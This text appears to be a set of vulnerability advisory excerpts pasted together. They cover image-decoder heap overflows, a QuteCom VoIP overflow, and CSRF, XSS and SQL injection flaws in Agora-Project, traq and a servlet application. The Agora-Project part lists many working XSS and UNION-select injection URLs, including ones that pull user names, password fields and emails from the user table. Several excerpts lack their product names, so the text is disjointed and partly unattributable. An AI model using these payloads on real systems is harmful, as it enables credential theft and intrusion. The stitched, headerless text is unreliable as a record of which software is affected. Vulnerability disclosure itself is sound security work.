An indexing error when processing the ImageDescriptor structure of GIF images can be exploited to corrupt memory via a specially crafted 'ImageLeftPosition' value. The vulnerabilities are confirmed in version 1.98.8. Other versions may also be affected.
Insufficient validation in ID_ICO.apl when copying colours from cursors in .CUR files can be exploited to cause a heap-based buffer overflow via a .CUR file containing a specially crafted "ColorsImportant" field value.
An error in IDE_ACDStd.apl when allocating memory based on values in the Logical Screen Descriptor structure of a GIF image and later copying data into the buffer without ensuring that it's adequately sized can be exploited to corrupt heap memory.
Insufficient validation in ID_PICT.apl of specific byte values used as sizes in the image content can be exploited to cause a heap-based buffer overflow via a specially crafted .PCT file.
Insufficient validation in IDE_ACDStd.apl of specific byte values used as sizes in the image content when decompressing run-length encoded bitmaps can be exploited to cause a heap-based buffer overflow via a specially crafted .RLE file.
Agora-Project is an intuitive groupware released under the GPL (based on PHP/MySQL). It contains many modules: File Manager (with versioning), Calendars (with resource calendars), Task Manager, Bookmark Manager, Contacts, News, Forum, Instant Messaging, etc. The vulnerabilities are XSS, SQLi and BSQLi.
XSS exploits include:
192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur"><script>alert('xss')</script>
192.168.0.1/module_agenda/evenement.php?id_evenement="<script>alert('xss')</script>
192.168.0.1/module_contact/contact.php?id_contact="<script>alert('xss')</script>
192.168.0.1/module_contact/index.php?id_dossier="<script>alert('xss')</script>
192.168.0.1/module_tache/index.php?id_dossier="<script>alert('xss')</script>
192.168.0.1/module_agenda/index.php?printmode="<script>alert('xss')</script>
192.168.0.1/module_lien/index.php?id_dossier="<script>alert('xss')</script>
192.168.0.1/module_forum/index.php?theme="<script>alert('xss')</script>
192.168.0.1/module_fichier/index.php?id_dossier="<script>alert('xss')</script>
192.168.0.1/module_tableau_bord/index.php?tdb_periode="<script>alert('xss')</script>
SQLi exploits include:
192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp,email FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp,email,id_utilisateur FROM gt_utilisateur WHERE 1 AND '1'='1
BSQLi exploits include:
192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_agenda/evenement.php?id_evenement=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_contact/contact.php?id_contact=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_contact/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_tache/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_agenda/index.php?printmode=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_lien/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_fichier/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
192.168.0.1/module_tableau_bord/index.php?tdb_periode=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1
QuteCom (previously called WengoPhone) is a free software SIP-compliant VoIP client developed by the QuteCom (previously OpenWengo) community under the GNU General Public License (GPL). This bug in QuteCom v2.2.1 is caused by a boundary error in the processing of an overly long phone number. This heap buffer overflow can be triggered by dialing a phone number or character set of more than 5000 characters from the soft phone. To trigger this bug, the application must be connected to a VoIP/SIP server. An Asterisk-based PBX phone system, "TrixBox", was used to test this crash.
The whole administration interface is prone to several client-side attacks. Examples include a file deletion vulnerability, cross-site scripting (XSS), CSRF to change the admin email and password, and CSRF to add a new admin user.
traq-2.3.5 is prone to Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS) and SQL injection vulnerabilities. The vulnerable code section is located in the admincp/groups.php file, where the application fails to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
Input passed via the GET parameter 'selectedModuleOnly' in the 'ModuleServlet.do' script is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The GET parameter 'updateRegn' in the 'SoftwareRegistration.do' script is vulnerable to an XSS issue where the attacker can execute arbitrary HTML and script code in a user's browser session in the context of an affected site.